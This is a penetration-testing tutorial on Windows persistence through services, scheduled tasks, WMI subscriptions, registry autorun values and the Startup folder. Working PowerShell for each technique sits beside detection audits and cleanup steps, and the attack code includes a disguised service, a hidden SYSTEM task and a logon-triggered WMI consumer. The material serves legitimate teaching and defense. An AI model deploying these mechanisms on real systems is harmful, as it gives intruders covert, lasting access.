Understanding Persistence Techniques in Penetration Testing

Why Persistence Matters

Gaining initial access is only the first step: an implant that lives inside a single exploited process is lost as soon as that process exits, the user logs off, or the machine reboots. Persistence techniques relaunch the attacker's code automatically across those events, without a second exploit. Several Windows mechanisms serve this purpose, and they differ in the privileges they require and in the footprint they leave for defenders.

Common Methods of Persistence

Windows Services

Windows services run in the background under the Service Control Manager (SCM) without any user interaction, which makes them a dependable persistence mechanism. An attacker with administrative rights (creating a service requires them) installs a service set to start automatically and points it at a payload. The payload has to implement the service control protocol, or be wrapped by something that does; a plain executable is started and then terminated by the SCM when it fails to report that it is running.

Why Services Are Effective:

  • Start at boot, before any user logs in

  • Run continuously in the background and can be configured to restart on failure

  • Run as LocalSystem by default, so no separate elevation is needed once the service exists

  • Use Case: Attackers create a service whose name, display name and description mimic a legitimate Windows component, keeping SYSTEM-level access across logoffs and reboots.
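The following PowerShell is an added example, not code from the original article. It registers an auto-start service the way an attacker would and then runs the audit a defender would use to find it. It assumes an elevated session on a lab host; the service name WinUpdateSvc and the payload path C:\ProgramData\svc\update.exe are placeholders chosen for illustration.

```powershell
# Added example, not from the original article. Assumes an elevated PowerShell
# session on a lab host. The service name, display name and payload path are
# illustrative placeholders, not identifiers taken from the article.
$ServiceName = 'WinUpdateSvc'
$PayloadPath = 'C:\ProgramData\svc\update.exe'   # hypothetical implant path

# --- Attacker side: register an auto-start service running as LocalSystem ---
# Creating a service needs administrative rights. The binary must implement the
# service control protocol (StartServiceCtrlDispatcher): a plain console EXE is
# launched, but the SCM kills it after the start timeout because it never
# reports SERVICE_RUNNING. Real implants ship a service stub or a wrapper that
# spawns the payload and then satisfies (or ignores) the SCM.
New-Service -Name $ServiceName `
            -DisplayName 'Windows Update Helper' `
            -Description 'Keeps Windows components up to date.' `
            -BinaryPathName "`"$PayloadPath`"" `
            -StartupType Automatic | Out-Null
Start-Service -Name $ServiceName -ErrorAction SilentlyContinue

# --- Defender side: list services whose binary sits outside the usual install
# roots or is not signed by Microsoft. On a stock build this returns only
# third-party software; review anything with a generic-sounding name. ---
function Find-SuspiciousServices {
    $trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        # Extract the executable: quoted path first, otherwise up to the first space
        # (an unquoted path containing spaces is itself a weak signal).
        $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split ' ')[0] }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        $outsideTrusted = -not ($trustedRoots | Where-Object { $exe -like "$_*" })
        $signer = if (Test-Path -LiteralPath $exe) {
            (Get-AuthenticodeSignature -FilePath $exe).SignerCertificate.Subject
        } else { '<binary missing>' }
        # Unsigned binaries have a null signer, which -notlike also flags.
        if ($outsideTrusted -or ($signer -notlike '*Microsoft*')) {
            [pscustomobject]@{
                Name      = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                Binary    = $exe
                Signer    = $signer
            }
        }
    }
}
Find-SuspiciousServices | Format-Table -AutoSize -Wrap

# Cleanup for the lab host (sc.exe delete works on every PowerShell version).
Stop-Service -Name $ServiceName -ErrorAction SilentlyContinue
sc.exe delete $ServiceName | Out-Null
```

The audit deliberately keys on the binary's location and Authenticode signer rather than on the service name, because the name and description are exactly what an attacker controls; the service in the first half of the block is caught by both checks.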

Scheduled Tasks

Windows Task Scheduler runs a program at a set time or in response to an event, and the same mechanism serves persistence. Any user can create tasks that run under their own account; a task that runs as SYSTEM or as another user requires administrative rights.

Example Command:

schtasks /create /tn "UpdateService" /sc onlogon /tr "malicious.exe"

Key options:

  • Schedule type (/sc): MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE for time-based execution

  • Event triggers (/sc): ONSTART, ONLOGON, ONIDLE, and ONEVENT for an Event Log entry matching an XPath query

  • Run-as account (/ru): /ru SYSTEM runs the task as LocalSystem but requires an elevated prompt; this is not an escalation path, it lets an attacker who already has SYSTEM keep it across reboots

  • Use Case: Attackers schedule a task marked hidden that runs at every logon, so the payload is relaunched without user interaction and does not appear in the Task Scheduler console.

Scheduled tasks fire at defined intervals or on system events, survive reboots, and are stored as XML under %SystemRoot%\System32\Tasks, which is also where defenders should look.
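The block below is an added example, not code from the original article. It extends the article's schtasks one-liner to run as SYSTEM, shows the equivalent ScheduledTasks module call (which can also mark the task hidden), and then enumerates tasks the way a defender would. It assumes an elevated session; the task name UpdateService and the payload path are placeholders.

```powershell
# Added example, not from the original article. Assumes an elevated session;
# the task name "UpdateService" and the payload path are illustrative placeholders.
$TaskName    = 'UpdateService'
$PayloadPath = 'C:\ProgramData\svc\update.exe'   # hypothetical implant path

# --- Attacker side: the article's one-liner, extended to run as LocalSystem at
# every logon. /ru SYSTEM and /rl HIGHEST need administrative rights; /f
# overwrites an existing task of the same name without prompting.
schtasks.exe /create /f /tn $TaskName /sc onlogon /ru SYSTEM /rl HIGHEST /tr "`"$PayloadPath`""

# The same task through the ScheduledTasks module, which also exposes the
# Hidden setting that removes the task from the Task Scheduler console listing.
$action    = New-ScheduledTaskAction -Execute $PayloadPath
$trigger   = New-ScheduledTaskTrigger -AtLogOn
$settings  = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
                       -Settings $settings -Principal $principal -Force | Out-Null

# --- Defender side: enumerate enabled tasks and flag those whose action runs a
# binary outside the usual install roots, or that are hidden. Hidden tasks are
# invisible in taskschd.msc but not to Get-ScheduledTask or schtasks /query.
# Bare names such as powershell.exe (resolved via PATH) are flagged as well. ---
function Find-SuspiciousScheduledTasks {
    $trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($act in $task.Actions) {
            if (-not $act.Execute) { continue }   # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($act.Execute.Trim('"'))
            $outside = -not ($trustedRoots | Where-Object { $exe -like "$_*" })
            if ($outside -or $task.Settings.Hidden) {
                [pscustomobject]@{
                    Task     = $task.TaskPath + $task.TaskName
                    RunAs    = $task.Principal.UserId
                    Hidden   = [bool]$task.Settings.Hidden
                    Triggers = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task' }) -join ','
                    Execute  = $exe
                    Args     = $act.Arguments
                }
            }
        }
    }
}
Find-SuspiciousScheduledTasks | Format-Table -AutoSize -Wrap

# Cleanup for the lab host.
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
```

Run the audit before and after registering the task to see the new row: it shows RunAs SYSTEM, Hidden True, a LogonTrigger, and an Execute path under C:\ProgramData, each of which is a reason to pull the task's XML from %SystemRoot%\System32\Tasks and check who created it.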

WMI Event Consumers

Windows Management Instrumentation (WMI) allows attackers to create event-based persistence by triggering actions based on system events.

Why WMI is Useful for Persistence:

  • Permanent subscriptions are executed by the WMI provider host (WmiPrvSE.exe) as SYSTEM; creating one requires administrative rights

  • Can trigger execution on almost any event WMI can observe: logons, process starts, time since boot, changes to a class instance

  • Lives in the WMI repository rather than in the Run keys, Task Scheduler or Startup folders, so autostart-focused tools miss it unless they query root\subscription; Sysmon event IDs 19, 20 and 21 record the creation of the filter, consumer and binding

  • Use Case: Attackers create a __EventFilter, a CommandLineEventConsumer (or ActiveScriptEventConsumer) and a __FilterToConsumerBinding so that a payload runs whenever the filtered event occurs, such as an interactive logon or a fixed number of seconds after boot.
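The PowerShell below is an added example, not code from the original article. It builds the three-object permanent subscription described above, fired by an interactive logon, and then resolves every binding in root/subscription back to its query and action so a defender can review them. It assumes an elevated session; the filter and consumer names and the payload path are placeholders.

```powershell
# Added example, not from the original article. Assumes an elevated session;
# the filter/consumer names and the payload path are illustrative placeholders.
$PayloadPath = 'C:\ProgramData\svc\update.exe'   # hypothetical implant path
$Namespace   = 'root/subscription'

# --- Attacker side: a permanent subscription made of three objects. The WQL
# filter fires within 15 s of any interactive logon (LogonType 2). The
# CommandLineEventConsumer is executed by WmiPrvSE.exe as LocalSystem, so the
# implant inherits SYSTEM without a separate elevation step. Writing to
# root/subscription requires administrative rights.
$query = "SELECT * FROM __InstanceCreationEvent WITHIN 15 " +
         "WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2"

$filter = New-CimInstance -Namespace $Namespace -ClassName __EventFilter -Property @{
    Name = 'UpdateFilter'; EventNamespace = 'root/cimv2'; QueryLanguage = 'WQL'; Query = $query
}
$consumer = New-CimInstance -Namespace $Namespace -ClassName CommandLineEventConsumer -Property @{
    Name = 'UpdateConsumer'; CommandLineTemplate = "`"$PayloadPath`""
}
# The binding's Filter/Consumer properties are object references, hence [ref].
New-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding -Property @{
    Filter = [ref]$filter; Consumer = [ref]$consumer
} | Out-Null

# --- Defender side: resolve every binding to its filter query and consumer
# action. A clean install shows exactly one: "SCM Event Log Filter" bound to
# the NTEventLogEventConsumer "SCM Event Log Consumer". Anything else needs an
# owner. Sysmon event IDs 19, 20 and 21 log creation of these three objects. ---
function Get-WmiPersistence {
    $ns = 'root/subscription'
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer   # base class: all consumer types
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding | ForEach-Object {
        $b = $_
        $f = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }
        $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
        # First populated action property wins: command line, script body, or executable.
        $action = foreach ($p in 'CommandLineTemplate', 'ScriptText', 'ExecutablePath') { if ($c.$p) { $c.$p; break } }
        [pscustomobject]@{
            Filter       = $f.Name
            Query        = $f.Query
            ConsumerType = $c.CimClass.CimClassName
            Consumer     = $c.Name
            Action       = $action
        }
    }
}
Get-WmiPersistence | Format-List

# Cleanup for the lab host, in dependency order (binding first).
Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding |
    Where-Object { $_.Filter.Name -eq 'UpdateFilter' } | Remove-CimInstance
Get-CimInstance -Namespace $Namespace -ClassName __EventFilter -Filter "Name='UpdateFilter'" | Remove-CimInstance
Get-CimInstance -Namespace $Namespace -ClassName CommandLineEventConsumer -Filter "Name='UpdateConsumer'" | Remove-CimInstance
```

Querying __EventConsumer rather than a concrete consumer class matters: an audit that only lists CommandLineEventConsumer misses ActiveScriptEventConsumer subscriptions, whose VBScript or JScript body runs in scrcons.exe with the same SYSTEM privileges.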

Registry Modifications

The Windows registry stores configuration for the OS and applications, and several of its values name programs to launch at logon. Writing to those values gives persistence without creating a service or a task, and the HKCU locations below can be written by an unprivileged user.

Notable Registry Keys for Persistence:

  • Run and RunOnce Keys:
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    • The same keys under HKLM fire for every user but require administrative rights to write. RunOnce values are deleted after they execute, so they suit a one-time stager rather than long-term persistence.
    • Use Case: Attackers add a value pointing at a payload so it executes every time the user logs in.
  • CMD AutoRun Key:
    • HKCU\Software\Microsoft\Command Processor\AutoRun
    • Use Case: The command in this value runs every time cmd.exe starts, including cmd /c calls made by scripts and installers, so the attacker regains execution as soon as the user or any program opens a command prompt. The same frequency makes a noisy payload here easy to notice.
  • HKCU Load Key:
    • HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
    • Use Case: The "Load" value of this key (and its sibling "Run") is read by userinit.exe at logon and launches the named executable. It is checked by far fewer tools than the Run keys or Startup folders, so it often escapes autostart reviews.

These values give automatic execution at logon for the writing user (HKCU) or for every user (HKLM).

Startup Folder Exploitation

Another approach that avoids registry writes entirely is to drop a file into the Startup folder. Any executable, script, or shortcut (.lnk) there is launched by Explorer when the user logs in, and the .lnk form lets the real payload sit elsewhere on disk.

Location:

%AppData%\Microsoft\Windows\Start Menu\Programs\Startup
  • The all-users equivalent, %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp, runs for every account but requires administrative rights to write.
  • Use Case: Attackers drop a payload, or a shortcut to it, in this folder so it executes at every logon and persists across reboots.

One caveat: the per-user folder is part of the user profile. In non-persistent virtual desktop environments where profiles are discarded at logoff, a file placed there is lost with the profile, so an attacker who wants to survive the next session needs the all-users folder, a roaming profile, or a mechanism that lives outside the profile.
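The block below is an added example, not code from the original article, and serves both the registry section and the Startup folder section above. It writes each of the per-user locations the article names (Run, cmd.exe AutoRun, the Load value, and a Startup-folder shortcut) and then dumps every logon autostart from both hives and both Startup folders the way a defender would. It runs as the current user for the HKCU and per-user paths; the HKLM and all-users variants mentioned in comments need administrative rights. The value names and the payload path are placeholders.

```powershell
# Added example, not from the original article. Runs as the current (non-elevated)
# user for the HKCU and per-user Startup locations; the HKLM and all-users
# variants noted in comments need administrative rights. The value names and the
# payload path are illustrative placeholders.
$PayloadPath = 'C:\ProgramData\svc\update.exe'   # hypothetical implant path

function Set-AutorunValue {
    param([string]$Key, [string]$Name, [string]$Value)
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -Value $Value -PropertyType String -Force | Out-Null
}

# --- Attacker side ---
# 1. Run key: executed by Explorer at this user's logon. The HKLM:\ twin fires
#    for every user; RunOnce entries are deleted after they run, so they are
#    only useful as a one-shot stager.
Set-AutorunValue 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' 'UpdateHelper' "`"$PayloadPath`""

# 2. cmd.exe AutoRun: runs before every cmd.exe instance, including "cmd /c"
#    calls made by scripts, so a noisy payload here is quickly noticed.
Set-AutorunValue 'HKCU:\Software\Microsoft\Command Processor' 'AutoRun' "start /b `"`" `"$PayloadPath`""

# 3. Load value: userinit.exe launches whatever the "Load" value of this key
#    names at logon. The key path is the one the article lists; "Load" is the
#    value name, and it is checked by far fewer tools than the Run keys.
Set-AutorunValue 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows' 'Load' $PayloadPath

# 4. Startup folder: a .lnk, no registry write at all. The all-users folder is
#    [Environment]::GetFolderPath('CommonStartup') and needs admin.
$startupDir = [Environment]::GetFolderPath('Startup')
$shortcut = (New-Object -ComObject WScript.Shell).CreateShortcut((Join-Path $startupDir 'Update Helper.lnk'))
$shortcut.TargetPath  = $PayloadPath
$shortcut.WindowStyle = 7   # 7 = start minimised
$shortcut.Save()

# --- Defender side: dump every logon autostart from both hives and both
# Startup folders, resolving .lnk targets so the real binary is shown. ---
function Get-LogonAutostarts {
    $regTargets = @(
        @{ Key = 'Software\Microsoft\Windows\CurrentVersion\Run';        Values = $null },
        @{ Key = 'Software\Microsoft\Windows\CurrentVersion\RunOnce';    Values = $null },
        @{ Key = 'Software\Microsoft\Command Processor';                 Values = @('AutoRun') },
        @{ Key = 'Software\Microsoft\Windows NT\CurrentVersion\Windows'; Values = @('Load', 'Run') }
    )
    foreach ($hive in 'HKCU:', 'HKLM:') {
        foreach ($t in $regTargets) {
            $path = "$hive\$($t.Key)"
            if (-not (Test-Path $path)) { continue }
            $item = Get-ItemProperty -Path $path
            # Run/RunOnce: every value is an autostart; the other keys: named values only.
            $names = if ($t.Values) { $t.Values } else {
                $item.PSObject.Properties.Name | Where-Object { $_ -notlike 'PS*' }
            }
            foreach ($n in $names) {
                if ($item.$n) { [pscustomobject]@{ Source = $path; Name = $n; Command = $item.$n } }
            }
        }
    }
    $wsh = New-Object -ComObject WScript.Shell
    foreach ($dir in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
        Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue | ForEach-Object {
            $cmd = if ($_.Extension -eq '.lnk') { $wsh.CreateShortcut($_.FullName).TargetPath } else { $_.FullName }
            [pscustomobject]@{ Source = $dir; Name = $_.Name; Command = $cmd }
        }
    }
}
Get-LogonAutostarts | Format-Table -AutoSize -Wrap
```

The audit reports the Load value and the cmd.exe AutoRun entry alongside the Run keys, which is the point: a review that stops at Run/RunOnce and the Startup folder leaves the two quieter locations unexamined. On 64-bit hosts an HKLM review should also cover the Wow6432Node copies of the Run keys, which this example omits.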

Conclusion

Understanding these persistence techniques is essential for both attackers and defenders. While penetration testers use them to evaluate security postures, blue teams must recognize and mitigate these risks to maintain system integrity.
